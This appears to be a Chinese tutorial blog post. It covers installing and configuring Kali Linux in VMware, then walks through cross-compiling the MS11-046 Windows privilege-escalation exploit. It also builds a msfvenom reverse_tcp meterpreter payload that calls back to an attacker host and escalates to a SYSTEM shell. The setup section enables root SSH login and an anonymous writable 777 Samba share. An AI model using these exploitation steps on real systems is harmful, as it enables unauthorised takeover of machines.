这是在虚拟机安装下面是介绍kali linux***操作系统

一、Kali简介

1.1、相关连接

Kali百度百科:https://baike.baidu.com/item/Kali%20linux/8305689?fr=aladdin

Kali wiki:https://en.wikipedia.org/wiki/Kali

Kali官网:https://www.kali.org/

1.2、重点介绍

Kali Linux是基于Debian的Linux发行版,设计用于数字取证操作系统。Kali Linux预装了许多***测试软件包括nmap、Wireshark、John the Ripper,以及Aircrack-ng.用户可通过硬盘、live CD或live USB运行Kali Linux。Kali Linux既有32位和64位的镜像。可用于x86指令集。同时还有基于ARM架构的镜像,可用于树莓派和三星的ARM Chromebook

综上可知,Kali是一款安全研究人员使用的Linux发行版系统。

安装环境

本部分安装时安装在VMware的虚拟机。

  1. 操作系统:Windows10 64位

  2. VMware:VMware 12

  3. Kali:kali-linux-2018.2-vm-amd64.ova

    Kali通用下载:https://www.kali.org/downloads/

    Kali下载连接:https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-hyperv-image-download/

      Kali系统官方提供可以直接导入VM的OVA系统。以下是下载的过程截图。如果版本更新可以在Kali的官网下载地址找到更新版本。

      kali linux安装教程_第1张图片

二、安装导入

下载以后,双击下载的“kali-linux-2018.2-vm-amd64.ova”(注意:此时已经安装了VMware,而且没有安装其他虚拟机,所以默认可以使用VMware打开这种格式的文件)然后导入即可,导入过程可以选择虚拟机的存储路径。导入后开机。

初始用户:root

初始密码:toor

导入后界面

      kali linux安装教程_第2张图片


记录下简单安装的步骤

kali linux安装教程_第3张图片

 

kali linux安装教程_第4张图片

 

kali linux安装教程_第5张图片

 

kali linux安装教程_第6张图片

 

kali linux安装教程_第7张图片

 

kali linux安装教程_第8张图片

 

kali linux安装教程_第9张图片

 

kali linux安装教程_第10张图片

 

kali linux安装教程_第11张图片

 

kali linux安装教程_第12张图片

 

kali linux安装教程_第13张图片

 

kali linux安装教程_第14张图片

 

kali linux安装教程_第15张图片

 

 

kali linux安装教程_第16张图片

 

kali linux安装教程_第17张图片

 

kali linux安装教程_第18张图片

 

kali linux安装教程_第19张图片

 

kali linux安装教程_第20张图片

 

kali linux安装教程_第21张图片

 

 

kali linux安装教程_第22张图片

 

kali linux安装教程_第23张图片

 

kali linux安装教程_第24张图片

 

kali linux安装教程_第25张图片

 

kali linux安装教程_第26张图片

 

kali linux安装教程_第27张图片

 

 

kali linux安装教程_第28张图片

 

kali linux安装教程_第29张图片

 

kali linux安装教程_第30张图片

 

kali linux安装教程_第31张图片

 

kali linux安装教程_第32张图片

 

kali linux安装教程_第33张图片

 

kali linux安装教程_第34张图片

 

kali linux安装教程_第35张图片

使用配置

因为Kali中已经集成了很多工具,所以初次使用,可以配置一下使Kali用起来更得心应手。

准备工作:先查看VMtools是默认生效的(开机后需要有个反应时间)

3.1环境配置

alias,常用命令的命令别名开启(默认ll命令不是ls -l的别名)

?

123456789101112131415161718 1 切换到用户的主目录: 2 cd 3 用vi编辑.bashrc,这个文件开机后自动生效里面的别名: 4 vi .bashrc 5 把下面的行去掉注释: 6     alias ls='ls --color=auto' 7     alias dir='dir --color=auto' 8     alias vdir='vdir --color=auto' 910     alias grep='grep --color=auto'11     alias fgrep='fgrep --color=auto'12     alias egrep='egrep --color=auto'1314     alias ll='ls -l'15     alias la='ls -A'16     alias l='ls -CF17 然后保存退出,然后生效当前配置:18 source .bashrc

把桌面目录的文件转移到文档目录:

?

1 1 mv /root/Desktop/* /root/Documents/

语言设置中文

?

12345678910111213141516 1 备份原配置: 2 mv /etc/default/locale /etc/default/locale.backup`date "+%Y%m%d"` 3 查看现在的系统语言环境: 4 echo $LANG 5 locale 6 修改配置: 7 vi /etc/default/locale 8 修改后的配置: 9     LANG="zh_CN.UTF-8"10     LANGUAGE="zh_CN:zh"11     LC_ALL="zh_CN.UTF-8"12 修改后立刻生效:13 source /etc/default/locale14 查看是否生效:15 echo $LANG16 locale

 

 

取消自动锁屏

  点击设置,然后点击,如下图所示:

    kali linux安装教程_第36张图片

    kali linux安装教程_第37张图片

3.2、ssh配置

添加ssh开机自启动:

?

12345678 1 查看ssh运行状态:2 /etc/init.d/ssh status3 启动ssh:4 /etc/init.d/ssh start5 开机自启动配置:6 systemctl enable ssh.service7 或者8 update-rc.d ssh enable

修改配置让ssh允许root登录:

?

12345678910 1 编辑ssh配置文件: 2 vi /etc/ssh/sshd_config 3 4 在查找模式/Per可以查找到对应开启允许root登录的行(第32行,也可以按数字32然后按gg即可。) 5 原来这行配置: 6     PermitRootLogin prohibit-password 7 修改后这行的配置: 8     PermitRootLogin yes 9 然后保存退出。然后重启ssh服务即可:10 /etc/init.d/ssh restart

3.3、samba配置

Kali默认已经安装了samba服务程序,但是并没有设置开机自启动。

配置文件修改

?

12345678910111213141516 1 备份配置文件: 2 cp /etc/samba/smb.conf /etc/samba/smb.conf.backup`date "+%Y%m%d"` 3 修改配置文件: 4 >/etc/samba/smb.conf 5 vi /etc/samba/smb.conf 6 下面是具体配置内容: 7 [global] 8     map to guest = Bad User 9 [Share]10     path = /root/Public11     public = yes12     writable = yes13     available = yes14     browseable = yes15 需要修改samba的根目录的权限设置为777,否则不能匿名登录:16 chmode 777 /root/Public

启动samba

?

1234 1 启动方式2 建议使用的方式:/etc/init.d/smbd start3 或者:4 systemctl start smbd.service

开机自启动

?

1234 1 开机自启动方法:2 update-rc.d smbd enable3 或者4 systemctl enable smbd.service

3.4、搜狗输入法安装

搜狗输入法Debian系统安装包网址:https://pinyin.sogou.com/linux/

可以下载到windows系统本地然后通过samba服务传入Kali或者直接通过鼠标拖拽进Kali系统的桌面。

准备环境

?

1 1 apt-get install fcitx -y

安装过程

首先查看安装包:

?

123 1 ll2 总用量 223803 -rwxr--r-- 1 root root 22915896 7月  16 08:12 sogoupinyin_2.2.0.0108_amd64.deb

安装离线安装包(这个过程会报错):

?

1234567 1 dpkg -i sogoupinyin_2.2.0.0108_amd64.deb2 这个过程会报错:3 ......4         正在处理用于 shared-mime-info (1.9-2) 的触发器 ...5         正在处理用于 hicolor-icon-theme (0.17-2) 的触发器 ...6         在处理时有错误发生:7          sogoupinyin

然后执行下面命令:

?

1 1 apt --fix-broken install

然后再次安装:

?

1 1 dpkg -i sogoupinyin_2.2.0.0108_amd64.deb

此时安装完成。进入Kali可以通过shift按键切换中文搜狗输入法。


如何在kali linux上编译windows漏洞!

mingw-w64是一个用于创建windows应用程序的自由和开源软件开发环境。 mingw-w64最初叫mingw32,它当时不支持64位架构。在本教程中,我们将讨论如何使用mingw-64在 kali linux上编译windows漏洞。 让我们开始在kali linux上安装mingw-w64。

mingw-w64是一个用于创建windows应用程序的自由和开源软件开发环境。 mingw-w64最初叫mingw32,它当时不支持64位架构。

在本教程中,我们将讨论如何使用mingw-64在 kali linux上编译windows漏洞。 让我们开始在kali linux上安装mingw-w64。

1、在kali linux上安装mingw-w64

默认情况下,kali linux 2016.2和更低版本上未安装mingw-w64。 因此,我们需要先安装它,然后才能在linux上编译windows漏洞。 执行以下命令,安装mingw-w64:

apt-get update  apt-get install mingw-w64    

kali linux安装教程_第38张图片

使用apt-get install mingw-w64在您的kali主机上安装mingw-w64。

键入y为yes,以确认并继续mingw-w64安装过程。 下载和安装mingw-w64可能需要一段时间才能完成。

2、无法找到程序包mingw-w64的解决方法

有时,你尝试安装mingw-w64包时得到一个无法找到包mingw-w64的错误,并得到类似如下提示:

root@kali:~# apt-getinstall mingw-w64  reading package lists…done  building dependency tree  reading stateinformation… done  e: unable to locatepackage mingw-w64  

要解决这个问题,请确保在sources.list文件中具有正确的存储库。您可以使用nano编辑文件:

/etc/apt/sources.list

确保您在此文件中具有正确的存储库。 您可以在以下页面上找到不同版本的kali linux的存储库:


使用sources.list文件中的正确的存储库,您需要运行apt-get update,然后再次运行mingw-w64软件包的安装命令。

3、用mingw-w64交叉编译windows漏洞利用

现在我们已经安装了mingw-w64,可以开始编译windows漏洞利用程序了。 对于本教程,我们将编译一个用c编写的windows漏洞利用程序,以利用windows 7 sp0 x86中的cve-2011-1249(ms11-046)漏洞。 此版本的windows操作系统在辅助功能驱动程序(afd)中包含一个漏洞,允许已认证的非管理用户提升权限。即使mingw-w64是为非常需要的64位支持开发的,我们也可以编译32位windows漏洞。 让我们来看看如何编译32位windows漏洞。

让我们从exploit-db下载漏洞:

wget --output-document= 40564.c https://www.exploit-db.com/download/40564

使用以下命令编译windows 32位的afd.sys exploit:

i686-w64-mingw32-gcc[input file: source]–o [output file: .exe]-lws2_32

以下命令将编译windows 7 afd.sys特权升级漏洞:

i686-w64-mingw32-gcc 40564.c –o exploit.exe –lws2_32  

编译windows漏洞。

编译windows漏洞。

要将漏洞利用程序转移到目标主机,我们将使用内置的apacheweb服务器来提供它。 最后2个命令会将exploit复制到apache主目录并启动apache web服务器。

当我们从cmd.exe下载并执行该漏洞时,它将如下所示: 

kali linux安装教程_第39张图片

漏洞利用成功执行。

因为我们可以看到whoami命令在执行exploit之前返回一个普通用户权限,之后显示是system用户权限。这个exploit实际上在当前shell中生成一个新的shell,而不是在新窗口中创建一个新的shell。这意味着我们也可以从命令行shell运行此漏洞利用程序,例如meterpreter。让我们看看如何从meterpreter会话运行漏洞利用。

4、利用编译错误

当编译针对不同架构和操作系统的漏洞时,可能会发生许多错误。有很多因素可能导致编译失败,例如:语法,库,主机和目标体系结构,用于编译代码的已安装软件等等。一些错误可能很容易修复,有些错误则不是。同样重要的是不同的警告来自致命的错误,因为警告可能只是指示一些类似的过时的功能,不能阻止漏洞的工作。致命错误会阻止漏洞利用,因此需要修复。

处理编译错误的最佳方法是仔细阅读,然后在google上搜索解决方案。通常你不是第一个也不是唯一面对某个编译错误的人,因此没有必要重新发明轮子。在线资源(如堆栈交换)通常为您提供最常见的编译错误的可能解决方案。

5、从meterpreter shell中利用ms11-046

让我们使用msfvenom快速生成windows 32位meterpreter反向tcp有效负载,并在目标主机上执行它。 我们将在metasploit中使用多处理程序来捕获反向shell。

使用以下命令使用msfvenom创建有效负载:

msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcplhost=[ip attackbox] lport=4444 -e x86/shikata_ga_nai –f exe –o exploit.exe

请务必更换侦听主机ip,必要时更换侦听端口。现在启动msfconsole并运行以下命令来设置多处理器漏洞:

use exploit/multi/handler  set lhost [listening host ip]  set lport 4444  run   

在端口4444上启动反向tcp处理程序。

在端口4444上启动反向tcp处理程序。

然后下载利用程序到目标主机并执行它。 如果一切设置正确,您应该在msfconsole上收到一个反向meterpreter shell: 

kali linux安装教程_第40张图片

目标主机连接回kali。

在meterpreter命令行上运行下一“shell”命令并运行特权升级漏洞利用程序将shell升级到系统shell: 

kali linux安装教程_第41张图片

特权升级***通过我们的meterpreter会话成功执行。

正如你可以看到的,shell从特权测试用户shell变化到系统shell。 请注意,在执行它的shell中生成一个新的系统shell。 因此,我们不能看到利用输出,因为它是在有限的特权的旧shell。

您可以通过键入exit来验证这一点,将退出系统shell并返回到仍包含windows 7权限升级exploit输出的用户shell: 

kali linux安装教程_第42张图片

特权用户shell上的exploit输出。

学到的东西

在本教程中,我们已经了解了在linux上针对windows的交叉编译漏洞的基础知识。 我们已经学习了如何在kali linux上安装mingw-w64并解决最常见的安装问题。 为了练习漏洞编译过程,我们编译了一个针对windows7 x86的特权提升漏洞。 这也称为交叉编译。

我们已成功的在目标主机上执行已编译的可执行文件,并将shell从有限的用户shell升级到系统shell。 我们已经知道,这个特殊的exploit在shell中生成了一个shell,在这个shell中执行了exploit。 这样,我们还可以从命令行(例如meterpreter shell)执行特权提升漏洞利用。